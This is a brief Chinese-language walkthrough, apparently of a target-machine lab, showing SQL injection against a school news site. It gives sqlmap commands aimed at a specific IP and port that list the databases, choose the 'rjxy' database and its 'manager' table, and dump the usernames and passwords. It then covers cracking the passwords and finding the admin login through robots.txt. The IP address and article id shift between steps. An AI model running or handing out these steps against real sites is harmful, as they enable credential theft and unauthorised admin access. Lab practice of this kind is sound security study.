一、判断注入点(靶机示例)
点击一篇文章寻找注入点
注入点测试:
确定可以注入
二、使用sqlmap进行注入
1、打开sqlmap输入sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3093” -dbs
得到库
2、根据网页显示为软件学院我们选择rjxy进行库破解输入sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3093” -D rjxy --tables
得到rjxy库中的表
3、再选择可能存在密码的表这里我们选择manager输入sqlmap -u “http://117.167.136.244:28004/index/narticle.php?nid=3093” -D rjxy -T manager --columns
得到表中的列
4、输入sqlmap -u “http://117.167.136.244:28004/index/narticle.php?nid=3091” -D rjxy -T manager -C “password,sratus,uid,username” -dump
得到密码与账号
三、解密码
得到密码
四、登入后台
利用robots.txt
猜测可以输入http://117.167.136.144:28067/admins/login.php进入登录页面
输入前面得到的账号和密码即可进入后台